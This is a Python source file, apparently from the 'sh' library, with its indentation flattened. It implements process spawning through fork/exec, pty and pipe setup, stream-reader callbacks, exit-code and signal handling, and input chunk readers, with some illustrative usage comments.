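#   aggregate_keywords({"d": "\t", "t": True}, "=", "--")         # -> [b"-d", b"\t", b"-t"]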
def _start_daemon_thread(fn, name, exc_queue, *args):
def wrap(*args, **kwargs):
try:
fn(*args, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thrd = threading.Thread(target=wrap, name=name, args=args)
thrd.daemon = True
thrd.start()
return thrd
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = get_num_args(handler_to_inspect)
else:
if inspect.isfunction(handler_to_inspect):
num_args = get_num_args(handler_to_inspect)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = get_num_args(handler_to_inspect.__call__)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
# handler-closure with a reference to the process
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
args = handler_args
if len(args) == 2:
args = (handler_args[0], handler_args[1]())
return handler(chunk, *args)
return fn
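# illustrative callback shapes this supports (a sketch, not part of the library):
#
#   def cb(chunk): ...                   # gets only the output chunk
#   def cb(chunk, stdin): ...            # also gets the process's stdin queue
#   def cb(chunk, stdin, process): ...   # also gets the process, resolved from a
#                                        # weakref at call time (may be None)
#
# a callback that returns a truthy value signals that it wants no more data;
# that logic lives in the stream readers, outside this function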
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
exc = None
success = exit_code in ok_codes
bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION
# if this is a piped command, SIGPIPE must be ignored by us and not raise an
# exception, since it's perfectly normal for the consumer of a process's
# pipe to terminate early
if sigpipe_ok and -exit_code == signal.SIGPIPE:
bad_sig = False
success = True
if not success or bad_sig:
exc = get_rc_exc(exit_code)
return exc
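# illustrative results (a sketch, not part of the library):
#
#   get_exc_exit_code_would_raise(0, [0], False)               # -> None
#   get_exc_exit_code_would_raise(1, [0], False)               # -> ErrorReturnCode_1
#   get_exc_exit_code_would_raise(-signal.SIGKILL, [0], False) # -> SignalException_SIGKILL
#   get_exc_exit_code_would_raise(-signal.SIGPIPE, [0], True)  # -> None (piped, SIGPIPE is ok)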
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
exit_code = -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
exit_code = os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
return exit_code
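# illustrative mapping (a sketch, not part of the library), given the raw status
# word that os.waitpid returns:
#
#   - a normal exit with code 3 becomes 3
#   - death by SIGKILL becomes -9 (the negated signal number)
#   - anything else raises RuntimeError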
def no_interrupt(syscall, *args, **kwargs):
""" a helper for making system calls immune to EINTR """
ret = None
while True:
try:
ret = syscall(*args, **kwargs)
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
return ret
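# illustrative usage (a sketch, not part of the library):
#
#   pid, status = no_interrupt(os.waitpid, child_pid, 0)
#
# the call is simply retried whenever it fails with errno.EINTR (e.g. a signal
# handler ran while we were blocked in the syscall); any other OSError
# propagates unchanged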
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name from subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr,
call_args, pipe, process_assign_lock):
"""
cmd is the full string that will be exec'd. it includes the program
name and all its arguments
stdin, stdout, stderr are what the child will use for standard
input/output/err
call_args is a mapping of all the special keyword arguments to apply
to the child process
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_tty_or_pipe = ob_is_tty(stdin) or ob_is_pipe(stdin)
stdout_is_tty_or_pipe = ob_is_tty(stdout) or ob_is_pipe(stdout)
stderr_is_tty_or_pipe = ob_is_tty(stderr) or ob_is_pipe(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
# if we're passing in a custom stdin/out/err value, we obviously have
# to force not using single_tty
custom_in_out_err = stdin or stdout or stderr
single_tty = (ca["tty_in"] and ca["tty_out"])\
and not custom_in_out_err
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (that is, if stdout and stdin are both the same TTY)
if single_tty:
self._stdin_read_fd, self._stdin_write_fd = pty.openpty()
self._stdout_read_fd = os.dup(self._stdin_read_fd)
self._stdout_write_fd = os.dup(self._stdin_write_fd)
self._stderr_read_fd = os.dup(self._stdin_read_fd)
self._stderr_write_fd = os.dup(self._stdin_write_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_write_fd = stdin._pipe_fd
self._stdin_read_fd = None
self._stdin_process = stdin
elif stdin_is_tty_or_pipe:
self._stdin_write_fd = os.dup(get_fileno(stdin))
self._stdin_read_fd = None
elif ca["tty_in"]:
self._stdin_read_fd, self._stdin_write_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_write_fd, self._stdin_read_fd = os.pipe()
if stdout_is_tty_or_pipe and not tee_out:
self._stdout_write_fd = os.dup(get_fileno(stdout))
self._stdout_read_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_read_fd, self._stdout_write_fd = pty.openpty()
else:
self._stdout_read_fd, self._stdout_write_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is dup'd
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_tty_or_pipe and not tee_out:
self._stderr_read_fd = None
else:
self._stderr_read_fd = os.dup(self._stdout_read_fd)
self._stderr_write_fd = os.dup(self._stdout_write_fd)
elif stderr_is_tty_or_pipe and not tee_err:
self._stderr_write_fd = os.dup(get_fileno(stderr))
self._stderr_read_fd = None
else:
self._stderr_read_fd, self._stderr_write_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_read_fd
if piped == "err":
fd_to_use = self._stderr_read_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_write_fd)
# this is a hack, but what we're doing here is intentionally throwing an
# OSError exception if our child process's directory doesn't exist,
# but we're doing it BEFORE we fork. the reason for before the fork is
# error handling. i'm currently too lazy to implement what
# subprocess.py did and set up an error pipe to handle exceptions that
# happen in the child between fork and exec. it has only been seen in
# the wild for a missing cwd, so we'll handle it here.
cwd = ca["cwd"]
if cwd is not None and not os.path.exists(cwd):
os.chdir(cwd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_write_fd) in the parent after the child starts
# writing.
if IS_OSX:
close_pipe_read, close_pipe_write = os.pipe()
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_OSX:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
# going to have an exception, which is impossible to know, because what if os.execv raises an exception? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_tty_or_pipe and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_write_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_read_fd:
os.close(self._stdin_read_fd)
if self._stdout_read_fd:
os.close(self._stdout_read_fd)
if self._stderr_read_fd:
os.close(self._stderr_read_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_write_fd, 0)
os.dup2(self._stdout_write_fd, 1)
os.dup2(self._stderr_write_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_tty_or_pipe:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except:
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_write_fd)
os.close(self._stdout_write_fd)
os.close(self._stderr_write_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_OSX:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024**2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read,
1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin or Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the process's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
if ca["tty_in"] and not stdin_is_tty_or_pipe:
setwinsize(self._stdin_read_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
if ca["tty_in"] and not stdin_is_tty_or_pipe:
attr = termios.tcgetattr(self._stdin_read_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_read_fd, termios.TCSANOW, attr)
# we're only going to create a stdin thread iff we have potential
# for stdin to come in. this would be through a stdout callback or
# through an object we've passed in for stdin
potentially_has_input = callable(stdout) or stdin
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_read_fd and potentially_has_input:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_read_fd,
self.stdin, ca["in_bufsize"], ca["encoding"],
ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and \
(tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's filedescriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this process's stdout fd to the other
# process's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_read_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = \
StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_read_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout)
elif self._stdout_read_fd:
os.close(self._stdout_read_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err \
and self._stderr_read_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and \
(ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(Logger("streamreader"),
self._stderr_read_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr)
elif self._stderr_read_fd:
os.close(self._stderr_read_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"],
self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and dups the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
# these next 3 properties are primarily for tests
@property
def output_thread_exc(self):
exc = None
try:
exc = self._output_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def input_thread_exc(self):
exc = None
try:
exc = self._input_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def bg_thread_exc(self):
exc = None
try:
exc = self._bg_thread_exc_queue.get(False)
except Empty:
pass
return exc
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def get_pgid(self):
""" return the CURRENT group id of the process. this differs from
self.pgid in that this reflects the current state of the process, where
self.pgid is the group id at launch """
return os.getpgid(self.pid)
def get_sid(self):
""" return the CURRENT session id of the process. this differs from
self.sid in that this reflects the current state of the process, where
self.sid is the session id at launch """
return os.getsid(self.pid)
def signal_group(self, sig):
self.log.debug("sending signal %d to group", sig)
os.killpg(self.get_pgid(), sig)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
os.kill(self.pid, sig)
def kill_group(self):
self.log.debug("killing group")
self.signal_group(signal.SIGKILL)
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False, self.exit_code
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False, self.exit_code
return True, self.exit_code
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
self._process_just_ended()
return False, self.exit_code
# no child process
except OSError:
return False, self.exit_code
else:
return True, self.exit_code
finally:
self._wait_lock.release()
def _process_just_ended(self):
if self._timeout_timer:
self._timeout_timer.cancel()
done_callback = self.call_args["done"]
if done_callback:
success = self.exit_code in self.call_args["ok_code"]
done_callback(success, self.exit_code)
# this can only be closed at the end of the process, because it might be
# the CTTY, and closing it prematurely will send a SIGHUP. we also
# don't want to close it if there's a self._stdin_stream, because that
# is in charge of closing it also
if self._stdin_read_fd and not self._stdin_stream:
os.close(self._stdin_read_fd)
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
witnessed_end = False
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
witnessed_end = True
else:
self.log.debug("exit code already set (%d), no need to wait",
self.exit_code)
self._quit_threads.set()
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait, then signal to our output thread that the child process is
# done, and we should have finished reading all the stdout/stderr
# data that we can by now
timer = threading.Timer(2.0, self._stop_output_event.set)
timer.start()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
timer.cancel()
self._background_thread.join()
if witnessed_end:
self._process_just_ended()
return self.exit_code
def input_thread(log, stdin, is_alive, quit, close_before_term):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits for the process to end AND for everything
that can be written to be written """
done = False
closed = False
alive = True
poller = Poller()
poller.register_write(stdin)
while poller and alive:
changed = poller.poll(1)
for fd, events in changed:
if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
log.debug("%r ready for more input", stdin)
done = stdin.write()
if done:
poller.unregister(stdin)
if close_before_term:
stdin.close()
closed = True
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if not closed:
stdin.close()
def event_wait(ev, timeout=None):
triggered = ev.wait(timeout)
if IS_PY26:
triggered = ev.is_set()
return triggered
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive,
quit):
""" handles the timeout logic """
# if there's a timeout event, loop
if timeout_event:
while not quit.is_set():
timed_out = event_wait(timeout_event, 0.1)
if timed_out:
timeout_fn()
break
# handle_exit_code will be a function ONLY if our command was NOT waited on
# as part of its spawning. in other words, it's probably a background
# command
#
# this reports the exit code exception in our thread. it's purely for the
# user's awareness, and cannot be caught or used in any way, so it's ok to
# suppress this during the tests
if handle_exit_code and not RUNNING_TESTS: # pragma: no cover
alive = True
while alive:
quit.wait(1)
alive, exit_code = is_alive()
handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit,
stop_output_event):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
it's done """
poller = Poller()
if stdout is not None:
poller.register_read(stdout)
if stderr is not None:
poller.register_read(stderr)
# this is our poll loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while poller:
changed = no_interrupt(poller.poll, 0.1)
for f, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
log.debug("%r ready to be read from", f)
done = f.read()
if done:
poller.unregister(f)
elif events & POLLER_EVENT_ERROR:
# for some reason, we have to just ignore streams that have had an
# error. i'm not exactly sure why, but don't remove this until we
# figure that out, and create a test for it
pass
if timeout_event and timeout_event.is_set():
break
if stop_output_event.is_set():
break
# we need to wait until the process is guaranteed dead before closing our
# outputs, otherwise SIGPIPE
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if stdout:
stdout.close()
if stderr:
stderr.close()
class DoneReadingForever(Exception): pass
class NotYetReadyToRead(Exception): pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk and raise a DoneReadingForever
exception, or return None, when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
get_chunk = None
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, bytes):
log_msg = "bytes"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, GeneratorType):
log_msg = "generator"
get_chunk = get_iter_chunk_reader(iter(input_obj))
else:
try:
it = iter(input_obj)
except TypeError:
raise Exception("unknown input object")
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(it)
return get_chunk, log_msg
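# illustrative sketch (not part of the public API): how a few common _in
# objects map to chunk readers via determine_how_to_read_input. the names
# below are only for demonstration.
#
#   from io import StringIO
#   reader, kind = determine_how_to_read_input("hello\nworld\n")   # kind == "string"
#   reader, kind = determine_how_to_read_input(StringIO("hi"))     # kind == "file descriptor"
#   reader, kind = determine_how_to_read_input(iter(["a", "b"]))   # kind == "general iterable"
#
# each reader() returns one chunk per call and signals exhaustion by raising
# DoneReadingForever (or NotYetReadyToRead when data simply isn't ready yet).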
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.1)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
data = stdin()
except DoneReadingForever:
raise
if not data:
raise DoneReadingForever
return data
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
# python 3.* includes a fileno on stringios, but accessing it throws an
# exception. that exception is how we'll know we can't do a poll on
# stdin
is_real_file = True
if IS_PY3:
try:
stdin.fileno()
except UnsupportedOperation:
is_real_file = False
# this poll is for files that may not yet be ready to read. we test
# for fileno because StringIO/BytesIO cannot be used in a poll
if is_real_file and hasattr(stdin, "fileno"):
poller = Poller()
poller.register_read(stdin)
changed = poller.poll(0.1)
ready = False
for fd, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
ready = True
if not ready:
raise NotYetReadyToRead
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
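# worked example of the mapping above (illustrative only):
#   bufsize_type_to_bufsize(0)    -> 1     unbuffered: read one byte at a time
#   bufsize_type_to_bufsize(1)    -> 1024  line-buffered: read big chunks and let
#                                          StreamBufferer split them on newlines
#   bufsize_type_to_bufsize(4096) -> 4096  buffered by a specific amount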
